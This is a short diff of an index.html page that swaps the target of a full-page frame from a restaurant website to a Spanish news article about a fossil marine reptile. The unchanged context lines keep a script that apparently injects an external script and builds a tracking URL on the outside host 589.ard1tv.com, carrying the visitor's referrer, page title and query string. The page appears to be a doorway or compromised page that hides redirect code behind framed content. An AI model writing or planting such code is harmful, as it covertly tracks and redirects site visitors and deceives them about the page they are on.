--- a/index.html
+++ b/index.html
@@ -8,4 +8,4 @@ d.getElementsByTagName('head')[0].appendChild(s);
 }
 if (document.location.protocol === 'https:' && 'https://589.ard1tv.com/xzJkCVh8?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5e38ee0e5322b=script5e38ee0e5322c'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
 </script>
-<frameset rows="100%"><frame src="https://www.restauranteabarra.com/restaurante.html"></frameset>
+<frameset rows="100%"><frame src="https://www.europapress.es/ciencia/laboratorio/noticia-fosil-reptil-marino-apunta-dinosaurios-tambien-padecian-artritis-20120516104103.html"></frameset>
